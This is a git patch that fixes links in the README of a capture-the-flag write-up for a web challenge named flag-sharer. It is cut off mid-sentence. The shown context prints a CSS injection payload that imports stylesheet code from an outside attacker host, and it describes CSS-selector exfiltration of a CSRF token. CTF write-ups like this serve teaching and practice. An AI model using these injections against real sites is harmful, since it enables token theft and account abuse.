From 4b5f51556ff2fe09230ae38b423a0ca715e57fa3 Mon Sep 17 00:00:00 2001 From: haskal Date: Mon, 29 Jun 2020 23:28:40 -0400 Subject: [PATCH] fix links --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 3342e37..4a30e62 100644 --- a/README.md +++ b/README.md @@ -8,7 +8,7 @@ **Provided file(s)**: flag-sharer.tar -**Provided host(s)**: https://flag-sharer.ml +**Provided host(s)**: ## Write-up @@ -44,9 +44,9 @@ The response body of the `/item` page resolves to: @import url("https://evil.risky.services/evil.css");.css is not in your item list. ``` Thus, through these two injection points, it is possible to include arbitrary CSS on the `/gifts` page. -At this point in time, I was thinking that the solution to this challenge would be to perform the somewhat trivial form of CSS data exfiltration via `[value=""]` selectors on the relevant input elements. Imagine my dismay when I realized that the CSRF token which was my goal lie in a `